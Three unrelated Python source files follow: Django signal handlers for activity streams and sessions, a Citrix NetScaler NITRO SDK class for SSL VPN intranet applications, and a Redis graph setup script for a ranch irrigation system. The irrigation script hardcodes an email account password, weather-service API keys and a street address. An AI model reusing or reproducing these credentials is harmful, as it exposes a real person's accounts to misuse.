object_relationship_type=obj_rel,
actor=get_current_user_or_none())
activity_entry.save()
getattr(activity_entry, object1).add(obj1.pk)
getattr(activity_entry, object2).add(obj2_actual.pk)
# Record the role for RBAC changes
if 'role' in kwargs:
role = kwargs['role']
if role.content_object is not None:
obj_rel = '.'.join([role.content_object.__module__,
role.content_object.__class__.__name__,
role.role_field])
# If the m2m is from the User side we need to
# set the content_object of the Role for our entry.
if type(instance) == User and role.content_object is not None:
getattr(activity_entry, role.content_type.name.replace(' ', '_')).add(role.content_object)
activity_entry.role.add(role)
activity_entry.object_relationship_type = obj_rel
activity_entry.save()
connection.on_commit(
lambda: emit_activity_stream_change(activity_entry)
)
@receiver(current_user_getter)
def get_current_user_from_drf_request(sender, **kwargs):
'''
Provider a signal handler to return the current user from the current
request when using Django REST Framework. Requires that the APIView set
drf_request on the underlying Django Request object.
'''
request = get_current_request()
drf_request_user = getattr(request, 'drf_request_user', False)
return (drf_request_user, 0)
@receiver(pre_delete, sender=Organization)
def delete_inventory_for_org(sender, instance, **kwargs):
inventories = Inventory.objects.filter(organization__pk=instance.pk)
user = get_current_user_or_none()
for inventory in inventories:
try:
inventory.schedule_deletion(user_id=getattr(user, 'id', None))
except RuntimeError as e:
logger.debug(e)
@receiver(pre_delete, sender=WorkflowJobTemplateNode)
def delete_approval_templates(sender, instance, **kwargs):
if type(instance.unified_job_template) is WorkflowApprovalTemplate:
instance.unified_job_template.delete()
@receiver(pre_save, sender=WorkflowJobTemplateNode)
def delete_approval_node_type_change(sender, instance, **kwargs):
try:
old = WorkflowJobTemplateNode.objects.get(id=instance.id)
except sender.DoesNotExist:
return
if old.unified_job_template == instance.unified_job_template:
return
if type(old.unified_job_template) is WorkflowApprovalTemplate:
old.unified_job_template.delete()
@receiver(pre_delete, sender=WorkflowApprovalTemplate)
def deny_orphaned_approvals(sender, instance, **kwargs):
for approval in WorkflowApproval.objects.filter(workflow_approval_template=instance, status='pending'):
approval.deny()
@receiver(post_save, sender=Session)
def save_user_session_membership(sender, **kwargs):
session = kwargs.get('instance', None)
if not session:
return
user_id = session.get_decoded().get(SESSION_KEY, None)
if not user_id:
return
if UserSessionMembership.objects.filter(user=user_id, session=session).exists():
return
# check if user_id from session has an id match in User before saving
if User.objects.filter(id=int(user_id)).exists():
UserSessionMembership(user_id=user_id, session=session, created=timezone.now()).save()
expired = UserSessionMembership.get_memberships_over_limit(user_id)
for membership in expired:
Session.objects.filter(session_key__in=[membership.session_id]).delete()
membership.delete()
if len(expired):
consumers.emit_channel_notification(
'control-limit_reached_{}'.format(user_id),
dict(group_name='control', reason='limit_reached')
)
@receiver(post_save, sender=OAuth2AccessToken)
def create_access_token_user_if_missing(sender, **kwargs):
obj = kwargs['instance']
if obj.application and obj.application.user:
obj.user = obj.application.user
post_save.disconnect(create_access_token_user_if_missing, sender=OAuth2AccessToken)
obj.save()
post_save.connect(create_access_token_user_if_missing, sender=OAuth2AccessToken)
# Connect the Instance Group to Activity Stream receivers.
post_save.connect(activity_stream_create, sender=InstanceGroup, dispatch_uid=str(InstanceGroup) + "_create")
pre_save.connect(activity_stream_update, sender=InstanceGroup, dispatch_uid=str(InstanceGroup) + "_update")
pre_delete.connect(activity_stream_delete, sender=InstanceGroup, dispatch_uid=str(InstanceGroup) + "_delete")
|
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class vpnintranetapplication(base_resource) :
""" Configuration for SSLVPN intranet application resource. """
def __init__(self) :
self._intranetapplication = ""
self._protocol = ""
self._destip = ""
self._netmask = ""
self._iprange = ""
self._hostname = ""
self._clientapplication = []
self._spoofiip = ""
self._destport = ""
self._interception = ""
self._srcip = ""
self._srcport = 0
self._ipaddress = ""
self.___count = 0
@property
def intranetapplication(self) :
"""Name of the intranet application.<br/>Minimum length = 1<br/>Maximum length = 31.
"""
try :
return self._intranetapplication
except Exception as e:
raise e
@intranetapplication.setter
def intranetapplication(self, intranetapplication) :
"""Name of the intranet application.<br/>Minimum length = 1<br/>Maximum length = 31
"""
try :
self._intranetapplication = intranetapplication
except Exception as e:
raise e
@property
def protocol(self) :
"""Protocol used by the intranet application. If protocol is set to BOTH, TCP and UDP traffic is allowed.<br/>Possible values = TCP, UDP, ANY.
"""
try :
return self._protocol
except Exception as e:
raise e
@protocol.setter
def protocol(self, protocol) :
"""Protocol used by the intranet application. If protocol is set to BOTH, TCP and UDP traffic is allowed.<br/>Possible values = TCP, UDP, ANY
"""
try :
self._protocol = protocol
except Exception as e:
raise e
@property
def destip(self) :
"""Destination IP address, IP range, or host name of the intranet application. This address is the server IP address.<br/>Minimum length = 1.
"""
try :
return self._destip
except Exception as e:
raise e
@destip.setter
def destip(self, destip) :
"""Destination IP address, IP range, or host name of the intranet application. This address is the server IP address.<br/>Minimum length = 1
"""
try :
self._destip = destip
except Exception as e:
raise e
@property
def netmask(self) :
"""Destination subnet mask for the intranet application.
"""
try :
return self._netmask
except Exception as e:
raise e
@netmask.setter
def netmask(self, netmask) :
"""Destination subnet mask for the intranet application.
"""
try :
self._netmask = netmask
except Exception as e:
raise e
@property
def iprange(self) :
"""If you have multiple servers in your network, such as web, email, and file shares, configure an intranet application that includes the IP range for all the network applications. This allows users to access all the intranet applications contained in the IP address range.<br/>Minimum length = 1.
"""
try :
return self._iprange
except Exception as e:
raise e
@iprange.setter
def iprange(self, iprange) :
"""If you have multiple servers in your network, such as web, email, and file shares, configure an intranet application that includes the IP range for all the network applications. This allows users to access all the intranet applications contained in the IP address range.<br/>Minimum length = 1
"""
try :
self._iprange = iprange
except Exception as e:
raise e
@property
def hostname(self) :
"""Name of the host for which to configure interception. The names are resolved during interception when users log on with the NetScaler Gateway Plug-in.<br/>Minimum length = 1.
"""
try :
return self._hostname
except Exception as e:
raise e
@hostname.setter
def hostname(self, hostname) :
"""Name of the host for which to configure interception. The names are resolved during interception when users log on with the NetScaler Gateway Plug-in.<br/>Minimum length = 1
"""
try :
self._hostname = hostname
except Exception as e:
raise e
@property
def clientapplication(self) :
"""Names of the client applications, such as PuTTY and Xshell.<br/>Minimum length = 1.
"""
try :
return self._clientapplication
except Exception as e:
raise e
@clientapplication.setter
def clientapplication(self, clientapplication) :
"""Names of the client applications, such as PuTTY and Xshell.<br/>Minimum length = 1
"""
try :
self._clientapplication = clientapplication
except Exception as e:
raise e
@property
def spoofiip(self) :
"""IP address that the intranet application will use to route the connection through the virtual adapter.<br/>Default value: ON<br/>Possible values = ON, OFF.
"""
try :
return self._spoofiip
except Exception as e:
raise e
@spoofiip.setter
def spoofiip(self, spoofiip) :
"""IP address that the intranet application will use to route the connection through the virtual adapter.<br/>Default value: ON<br/>Possible values = ON, OFF
"""
try :
self._spoofiip = spoofiip
except Exception as e:
raise e
@property
def destport(self) :
"""Destination TCP or UDP port number for the intranet application. Use a hyphen to specify a range of port numbers, for example 90-95.<br/>Minimum length = 1.
"""
try :
return self._destport
except Exception as e:
raise e
@destport.setter
def destport(self, destport) :
"""Destination TCP or UDP port number for the intranet application. Use a hyphen to specify a range of port numbers, for example 90-95.<br/>Minimum length = 1
"""
try :
self._destport = destport
except Exception as e:
raise e
@property
def interception(self) :
"""Interception mode for the intranet application or resource. Correct value depends on the type of client software used to make connections. If the interception mode is set to TRANSPARENT, users connect with the NetScaler Gateway Plug-in for Windows. With the PROXY setting, users connect with the NetScaler Gateway Plug-in for Java.<br/>Possible values = PROXY, TRANSPARENT.
"""
try :
return self._interception
except Exception as e:
raise e
@interception.setter
def interception(self, interception) :
"""Interception mode for the intranet application or resource. Correct value depends on the type of client software used to make connections. If the interception mode is set to TRANSPARENT, users connect with the NetScaler Gateway Plug-in for Windows. With the PROXY setting, users connect with the NetScaler Gateway Plug-in for Java.<br/>Possible values = PROXY, TRANSPARENT
"""
try :
self._interception = interception
except Exception as e:
raise e
@property
def srcip(self) :
"""Source IP address. Required if interception mode is set to PROXY. Default is the loopback address, 127.0.0.1.<br/>Minimum length = 1.
"""
try :
return self._srcip
except Exception as e:
raise e
@srcip.setter
def srcip(self, srcip) :
"""Source IP address. Required if interception mode is set to PROXY. Default is the loopback address, 127.0.0.1.<br/>Minimum length = 1
"""
try :
self._srcip = srcip
except Exception as e:
raise e
@property
def srcport(self) :
"""Source port for the application for which the NetScaler Gateway virtual server proxies the traffic. If users are connecting from a device that uses the NetScaler Gateway Plug-in for Java, applications must be configured manually by using the source IP address and TCP port values specified in the intranet application profile. If a port value is not set, the destination port value is used.<br/>Minimum length = 1.
"""
try :
return self._srcport
except Exception as e:
raise e
@srcport.setter
def srcport(self, srcport) :
"""Source port for the application for which the NetScaler Gateway virtual server proxies the traffic. If users are connecting from a device that uses the NetScaler Gateway Plug-in for Java, applications must be configured manually by using the source IP address and TCP port values specified in the intranet application profile. If a port value is not set, the destination port value is used.<br/>Minimum length = 1
"""
try :
self._srcport = srcport
except Exception as e:
raise e
@property
def ipaddress(self) :
"""The IP address for the application. This address is the real application server IP address.
"""
try :
return self._ipaddress
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(vpnintranetapplication_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.vpnintranetapplication
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.intranetapplication) :
return str(self.intranetapplication)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
""" Use this API to add vpnintranetapplication.
"""
try :
if type(resource) is not list :
addresource = vpnintranetapplication()
addresource.intranetapplication = resource.intranetapplication
addresource.protocol = resource.protocol
addresource.destip = resource.destip
addresource.netmask = resource.netmask
addresource.iprange = resource.iprange
addresource.hostname = resource.hostname
addresource.clientapplication = resource.clientapplication
addresource.spoofiip = resource.spoofiip
addresource.destport = resource.destport
addresource.interception = resource.interception
addresource.srcip = resource.srcip
addresource.srcport = resource.srcport
return addresource.add_resource(client)
else :
if (resource and len(resource) > 0) :
addresources = [ vpnintranetapplication() for _ in range(len(resource))]
for i in range(len(resource)) :
addresources[i].intranetapplication = resource[i].intranetapplication
addresources[i].protocol = resource[i].protocol
addresources[i].destip = resource[i].destip
addresources[i].netmask = resource[i].netmask
addresources[i].iprange = resource[i].iprange
addresources[i].hostname = resource[i].hostname
addresources[i].clientapplication = resource[i].clientapplication
addresources[i].spoofiip = resource[i].spoofiip
addresources[i].destport = resource[i].destport
addresources[i].interception = resource[i].interception
addresources[i].srcip = resource[i].srcip
addresources[i].srcport = resource[i].srcport
result = cls.add_bulk_request(client, addresources)
return result
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
""" Use this API to delete vpnintranetapplication.
"""
try :
if type(resource) is not list :
deleteresource = vpnintranetapplication()
if type(resource) != type(deleteresource):
deleteresource.intranetapplication = resource
else :
deleteresource.intranetapplication = resource.intranetapplication
return deleteresource.delete_resource(client)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
deleteresources = [ vpnintranetapplication() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].intranetapplication = resource[i]
else :
if (resource and len(resource) > 0) :
deleteresources = [ vpnintranetapplication() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].intranetapplication = resource[i].intranetapplication
result = cls.delete_bulk_request(client, deleteresources)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
""" Use this API to fetch all the vpnintranetapplication resources that are configured on netscaler.
"""
try :
if not name :
obj = vpnintranetapplication()
response = obj.get_resources(client, option_)
else :
if type(name) != cls :
if type(name) is not list :
obj = vpnintranetapplication()
obj.intranetapplication = name
response = obj.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [vpnintranetapplication() for _ in range(len(name))]
obj = [vpnintranetapplication() for _ in range(len(name))]
for i in range(len(name)) :
obj[i] = vpnintranetapplication()
obj[i].intranetapplication = name[i]
response[i] = obj[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
""" Use this API to fetch filtered set of vpnintranetapplication resources.
filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = vpnintranetapplication()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
""" Use this API to count the vpnintranetapplication resources configured on NetScaler.
"""
try :
obj = vpnintranetapplication()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
""" Use this API to count filtered the set of vpnintranetapplication resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = vpnintranetapplication()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Spoofiip:
ON = "ON"
OFF = "OFF"
class Protocol:
TCP = "TCP"
UDP = "UDP"
ANY = "ANY"
class Interception:
PROXY = "PROXY"
TRANSPARENT = "TRANSPARENT"
class vpnintranetapplication_response(base_response) :
def __init__(self, length=1) :
self.vpnintranetapplication = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.vpnintranetapplication = [vpnintranetapplication() for _ in range(length)]
|
|
# file build system
#
# The purpose of this file is to load a system configuration
# in the graphic data base
#
import json
import redis
import redis_graph
import farm_template
from redis_graph.redis_graph_query import Query_Configuration
import copy
class Graph_Management():
def __init__( self , controller_name, io_server_name, data_store_name ):
self.redis_handle = redis.StrictRedis( host = "localhost", port=6379, db = 15 )
self.common = redis_graph.redis_graph_common.Redis_Graph_Common( self.redis_handle)
self.qc = redis_graph.redis_graph_query.Query_Configuration( self.redis_handle, self.common )
self.controller_name = controller_name
self.io_server_name = io_server_name
self.data_store_name = data_store_name
self.initialize_cb_handlers()
def match_relationship( self, query_string, json_flag = True ):
keys = self.qc.match_relationship( query_string )
return_value = []
for i in keys:
data = self.redis_handle.hgetall(i)
#print "data",data
temp = {}
for j in data.keys():
#print j, data[j]
try:
if json_flag == True:
temp[j] = json.loads(data[j])
else:
temp[j] = data[j]
except:
temp[j] = data[j]
return_value.append(temp)
return return_value
def find_relationship_keys( self, query_string, json_flag = True ):
return self.qc.match_relationship( query_string )
def find_remotes( self ):
keys = self.match_relationship("REMOTE_UNIT")
return keys
def find_remotes_by_function( self, function ):
keys = self.keys = self.match_relationship("REMOTE_UNIT")
return_value = []
for i in keys:
if function in set(i["function"]) :
return_value.append(i)
return return_value
def find_data_store_by_function(self, function):
keys = self.qc.match_label_property_generic( "DATA_STORE", "name", self.data_store_name, function )
return_value = {}
for i in keys:
data = self.redis_handle.hgetall(i)
return_value[data["name"]]= data
return return_value
def find_data_stores( self ):
data = self.match_relationship("DATA_STORE")
return data
def find_io_servers( self ):
keys = self.match_relationship("UDP_IO_SERVER")
return keys
def get_data( self, key,json_flag = True):
data = self.redis_handle.hgetall(key)
#print "data",key,data
temp = {}
for j in data.keys():
#print j, data[j]
try:
if json_flag == True:
temp[j] = json.loads(data[j])
else:
temp[j] = data[j]
except:
temp[j] = data[j]
return temp
def get_value( self, key ):
return self.redis_handle.hgetall(key["namespace"])
def convert_namespace( self, name ):
name = name.replace(chr(0x82),"[")
name = name.replace(chr(0x83),"~")
name = name.replace(chr(0x84),"]")
name = name.replace(chr(0x85),":")
return name
def assemble_name_list( self,key, property_array):
return_value = []
for i in property_array:
return_value.append(i[key])
return return_value
def form_key_list( self,key, property_array ):
return_value = []
for i in property_array:
return_value.append(i[key])
return return_value
def form_list_dict_from_keys( self, key, value_list, property_array):
return_value = []
for i in property_array:
print (i.keys() )
temp = {}
for j in value_list:
temp[i[key]] = i[j]
return_value.append(temp)
return return_value
def form_dict_from_keys( self, key, value, property_array):
return_value = {}
for i in property_array:
print( i.keys() )
return_value[i[key]] = i[value]
return return_value
def initialize_cb_handlers( self ):
self.cb_handlers = {}
def add_cb_handler( self, tag, function ):
self.cb_handlers[ tag ] = function
def verify_handler( self, tag ):
try:
return self.cb_handlers.has_key(tag)
except:
#print "handlers:", type(self.cb_handlers)
print ("tag", tag )
raise
def execute_cb_handlers( self, tag, value, parameters ): # parameters is a list
function = self.cb_handlers[tag]
return function( tag, value , parameters )
if __name__ == "__main__" :
redis_handle = redis.StrictRedis( host = "localhost", port=6379, db = 15 )
common = redis_graph.redis_graph_common.Redis_Graph_Common( redis_handle)
qc = redis_graph.redis_graph_query.Query_Configuration( redis_handle, common )
bc = redis_graph.redis_graph_populate.Build_Configuration(redis_handle,common)
cf = farm_template.Construct_Farm(redis_handle,common)
#
#
# Construct Systems
#
#
cf.construct_system("LaCima Operations")
#
#
# Construction Sites for LaCima
#
#
cf.construct_site( name="LaCima",address="21005 Paseo Montana Murrieta, Ca 92562")
# we are going to construct the data store here
cf.add_header_node("APPLICATION_SUPPORT")
cf.add_header_node( "UTILITY_MODULE", properties = {}, json_flag= True )
cf.add_info_node( "CIMIS_EMAIL","CIMIS_EMAIL",properties = { "imap_username" :'lacima.ranch@gmail.com',"imap_password" : 'Gr1234gfd'} , json_flag = True)
cf.end_header_node("UTILITY_MODULE")
cf.add_header_node( "MOISTURE_CONTROLLERS", properties = {}, json_flag= True )
cf.add_info_node("MOISTURE_MANUAL_UPDATE_FLAG","MANUAL_UPDATE_FLAG",properties = {},json_flag = True)
description_map = ["Bank 10A Watermark 8 inch","Bank 10A Resistive 8 inch", "Bank 10A Resistive 18 inch", "empty",
"Bank 10B Watermark 8 inch", "Bank 10B Resistive 8 inch","Bank 10B Resistive 18 inch","empty",
"Bank 10C Watermark 8 inch","Bank 10C Resistive 8 inch", "Bank 10C Resistive 18 inch", "empty",
"Bank 10D Watermark 8 inch", "Bank 10D Resistive 8 inch","Bank 10D Resistive 18 inch","empty" ]
depth_map = [8,8,18,0,8,8,18,0,8,8,18,0,8,8,18,0]
properties = {}
properties["description"] = "Moisture Sensor for Irrigation Bank10"
properties["description_map"] = description_map
properties["update_time"] = 15
properties["depth_map"] = depth_map
properties["moisture_list_store"] = "MOISTURE_1_DATA_STORE"
properties["air_temp_list_store"] = "MOISTURE_1_AIR_TEMP_LIST_STORE"
properties["roll_over_list_store"] = "MOISTURE_1_ROLL_OVER_LIST_STORE"
properties["slave_controller_address"] = 40
cf.add_info_node( "MOISTURE_CTR","moisture_1", properties = properties, json_flag= True )
cf.end_header_node("MOISTURE_CONTROLLERS")
cf.add_info_node( "CLOUD_STATUS_STORE","status_store", properties = {"queue_name":"status_store"} )
#altitude = 2400
#cf.add_eto_setup_code(access_codes = access_codes, altitude = altitude)
#cf.start_info_store()
#cf.add_eto_store()
cf.add_header_node( "ETO_SITES", properties = {"integrated_measurement":"LACIMA_INTEGRATED_ETO_ESTIMATE",
"measurement":"LACIMA_ETO_MEASUREMENTS",
"mv_threshold_number":1 } )
properties = { "api-key":"e1d03467-5c0d-4a9b-978d-7da2c32d95de" , "url":"http://et.water.ca.gov/api/data" , "longitude": -117.299459 ,"latitude":33.578156 }
properties["altitude"] = 2400
properties["measurement_tag"] = "CIMIS_SATELLITE_ETO"
properties["list_length"] = 100
properties["measurement"] = "CIMIS_SATELLITE_ETO_STORE"
properties["majority_vote_flag"] = True
cf.add_info_node( "ETO_ENTRY","ETO_CIMIS_SATELLITE",properties=properties, json_flag=True)
properties = { "api-key":"e1d03467-5c0d-4a9b-978d-7da2c32d95de" , "url":"http://et.water.ca.gov/api/data" , "station":62 }
properties["altitude"] = 2400
properties["measurement_tag"] = "CIMIS_ETO"
properties["list_length"] = 100
properties["measurement"] = "CIMIS_ETO_STORE"
properties["majority_vote_flag"] = True
cf.add_info_node( "ETO_ENTRY","ETO_CIMIS",properties=properties, json_flag=True)
properties = {"api-key":"8b165ee73a734f379a8c91460afc98a1" ,"url":"http://api.mesowest.net/v2/stations/timeseries?" , "station":"SRUC1" }
properties["altitude"] = 2400
properties["measurement_tag"] = "SRUC1_ETO"
properties["list_length"] = 100
properties["measurement"] = "SRUC1_ETO_STORE"
properties["majority_vote_flag"] = True
cf.add_info_node( "ETO_ENTRY","Santa_Rosa_RAWS",properties=properties, json_flag=True)
properties = {"api-key":"8b165ee73a734f379a8c91460afc98a1" ,"url":"http://api.mesowest.net/v2/stations/timeseries?" , "station":"SRUC1" }
properties["altitude"] = 2400
properties["measurement_tag"] = "HYBRID_SITE"
properties["list_length"] = 100
properties["measurement"] = "HYBRID_SITE_STORE"
properties["rollover"] = "moisture_1_rollover"
properties["majority_vote_flag"] = False
cf.add_info_node( "ETO_ENTRY","LaCima_Ranch",properties=properties, json_flag=True)
cf.end_header_node("ETO_SITES")
cf.add_header_node("RAIN_SOURCES",properties = {"measurement":"LACIMA_RAIN_MEASUREMENTS" } )
properties = { "api-key":"e1d03467-5c0d-4a9b-978d-7da2c32d95de" , "url":"http://et.water.ca.gov/api/data" , "station":62 }
properties["measurement_tag"] = "CIMIS_RAIN"
properties["list_length"] = 100
properties["measurement"] = "CIMIS_RAIN_STORE"
cf.add_info_node( "RAIN_ENTRY","CIMIS_RAIN",properties=properties, json_flag=True)
properties = {"api-key":"8b165ee73a734f379a8c91460afc98a1" ,"url":"http://api.mesowest.net/v2/stations/precip?" , "station":"SRUC1" }
properties["measurement_tag"] ="SRUC1_RAIN"
properties["list_length"] = 100
properties["measurement"] = "SRCU1_RAIN_STORE"
cf.add_info_node( "RAIN_ENTRY","SRUC1_RAIN",properties=properties, json_flag=True)
cf.end_header_node("RAIN_SOURCES")
cf.end_header_node("APPLICATION_SUPPORT")
cf.add_header_node("DATA_STORE",properties={"ip":"192.168.1.84","port":6379},json_flag = True)
cf.add_header_node( "DATA_ACQUISITION")
cf.add_header_node( "FIFTEEN_SEC_ACQUISITION",properties= {"measurement":"FIFTEEN_SEC_ACQUISITION","length":5760, "routing_key":"FIFTEEN_SEC_ACQUISITION" } )
properties = {}
properties["units"] = ""
properties["modbus_remote"] = "satellite_1"
properties["m_tag"] = "read_input_bit"
properties["parameters"] = [ "X002"]
properties["exec_tag" ] = ["get_gpio","master_valve_set_switch"]
cf.add_info_node( "FIFTEEN_SEC_ELEMENT","MASTER_VALVE_SWITCH_SET",properties=properties, json_flag=True)
properties = {}
properties["units"] = ""
properties["modbus_remote"] = "satellite_1"
properties["m_tag"] = "read_input_bit"
properties["parameters"] = [ "X003"]
properties["exec_tag" ] = ["get_gpio","master_valve_reset_switch"]
cf.add_info_node( "FIFTEEN_SEC_ELEMENT","MASTER_VALVE_SWITCH_RESET",properties=properties, json_flag=True)
cf.end_header_node("FIFTEEN_SEC_ACQUISITION") #DATA_ACQUISITION
cf.add_header_node( "MINUTE_ACQUISITION",properties= {"measurement":"MINUTE_LIST_STORE","length":10000, "routing_key":"MINUTE_ACQUISTION" } , json_flag=True )
properties = {}
properties["units"] = "mAmps"
properties["modbus_remote"] = "satellite_1"
properties["m_tag"] = "measure_analog"
properties["parameters"] = [ "DF1",1.0]
properties["exec_tag" ] = ["transfer_controller_current"]
cf.add_info_node( "MINUTE_ELEMENT","CONTROLLER_CURRENT",properties=properties, json_flag=True)
properties = {}
properties["units"] = "mAmps"
properties["modbus_remote"] = "satellite_1"
properties["m_tag"] = "measure_analog"
properties["parameters"] = ["DF2",1.0]
properties["exec_tag"] = ["transfer_irrigation_current"]
cf.add_info_node( "MINUTE_ELEMENT","IRRIGATION_VALVE_CURRENT",properties=properties, json_flag=True)
cf.add_header_node("FLOW_METER_LIST")
properties = {}
properties["units"] = "GPM"
properties["modbus_remote"] = "satellite_1"
properties["parameters"] = ["DS301", "C201",.0224145939] # counter id
properties["m_tag"] = "measure_counter"
properties["exec_tag"] = ["transfer_flow",.0224145939]
cf.add_info_node( "MINUTE_ELEMENT","MAIN_FLOW_METER",properties=properties, json_flag=True)
cf.end_header_node("FLOW_METER_LIST") #FLOW_METER_LIST
#cf.add_info_node( "MINUTE_ELEMENT","WELL_CONTROLLER_OUTPUT",properties={"units":"AMPS"}, json_flag = True )
#cf.add_info_node( "MINUTE_ELEMENT","WELL_CONTROLLER_INPUT", properties={"units":"AMPS" }, json_flag = True)
#cf.add_info_node( "MINUTE_ELEMENT","FILTER_PRESSURE", properties = { "units":"PSI" }, json_flag = True )
#cf.add_info_node( "MINUTE_ELEMENT", "WELL_PRESSURE", properties = {"units":"PSI" }, json_flag = True )
cf.end_header_node("MINUTE_ACQUISITION") #"MINUTE_ACQUISITION"
cf.add_header_node( "HOUR_ACQUISTION",properties= {"measurement":"HOUR_LIST_STORE","length":300 , "routing_key":"HOUR_ACQUISTION"} , json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["init_tag"] = ["clear_daily_modbus_statistics"]
properties["exec_tag"] = ["accumulate_daily_modbus_statistics"]
cf.add_info_node( "HOUR_ELEMENT","MODBUS_STATISTICS",properties=properties,json_flag=True )
cf.end_header_node("HOUR_ACQUISTION") # HOUR_ACQUISTION
cf.add_header_node( "DAILY_ACQUISTION", properties= {"measurement":"DAILY_LIST_STORE","length":300, "routing_key":"DAILY_ACQUISTION"}, json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["log_daily_modbus_statistics"]
cf.add_info_node( "DAILY_ELEMENT","daily_modbus_statistics", properties=properties,json_flag=True )
cf.end_header_node("DAILY_ACQUISTION") # Daily Acquistion
cf.end_header_node("DATA_ACQUISITION") #DATA_ACQUISITION
cf.add_header_node( "LINUX_DATA_ACQUISITION")
cf.add_header_node( "LINUX_HOUR_ACQUISTION",properties= {"measurement":"LINUX_HOUR_LIST_STORE","length":300 , "routing_key":"linux_hour_measurement"
} , json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["linux_memory_load"]
cf.add_info_node( "LINUX_HOUR_ELEMENT","linux_memory_load",properties=properties,json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["pi_temperature"]
cf.add_info_node( "LINUX_HOUR_ELEMENT","pi_temperature_hourly",properties=properties,json_flag=True )
cf.end_header_node( "LINUX_HOUR_ACQUISTION") # HOUR_ACQUISTION
cf.add_header_node( "LINUX_DAILY_ACQUISTION", properties= {"measurement":"LINUX_DAILY_LIST_STORE","length":300, "routing_key":"linux_daily_measurement"}, json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["linux_daily_disk"]
cf.add_info_node( "LINUX_DAILY_ELEMENT","linux_daily_disk", properties=properties,json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["linux_daily_redis"]
cf.add_info_node( "LINUX_DAILY_ELEMENT","linux_daily_redis", properties=properties,json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["linux_daily_memory"]
cf.add_info_node( "LINUX_DAILY_ELEMENT","linux_daily_memory", properties=properties,json_flag=True )
cf.end_header_node("LINUX_DAILY_ACQUISTION") # Daily Acquistion
cf.end_header_node("LINUX_DATA_ACQUISITION")
#cf.add_info_node( "MINUTE_LIST_STORE", "MINUTE_LIST_STORE",properties = { "LIST_LENGTH" :10000} , json_flag = True) # about 1 week of data
#cf.add_info_node( "HOUR_LIST_STORE", "HOUR_LIST_STORE",properties = { "LIST_LENGTH" :10000} , json_flag = True) # about 1 week of data
cf.add_header_node("RAIN_MEASUREMENTS")
cf.add_info_node("RAIN_STORE","CIMIS_RAIN_STORE",properties={"list_length":300},json_flag = True)
cf.add_info_node("RAIN_STORE","SRCU1_RAIN_STORE",properties={"list_length":300},json_flag = True)
cf.end_header_node("RAIN_MEASUREMENTS")
cf.add_info_node("INTEGRATED_RAIN_ESTIMATE","LACIMA_INTEGRATED_RAIN_ESTIMATE",properties={},json_flag = True )
cf.add_info_node("INTEGRATED_ETO_ESTIMATE","LACIMA_INTEGRATED_ETO_ESTIMATE",properties={"list_length":300},json_flag = True )
cf.add_header_node("ETO_MEASUREMENTS")
cf.add_info_node("ETO_STORE","CIMIS_SATELLITE_ETO_STORE",properties={"list_length":300},json_flag = True)
cf.add_info_node("ETO_STORE","CIMIS_ETO_STORE",properties={"list_length":300},json_flag = True)
cf.add_info_node("ETO_STORE","SRUC1_ETO_STORE",properties={"list_length":300},json_flag = True)
cf.add_info_node("ETO_STORE","HYBRID_SITE_STORE",properties={"list_length":300},json_flag = True)
cf.end_header_node("ETO_MEASUREMENTS")
cf.add_header_node("MOISTURE_SENSOR_DATA")
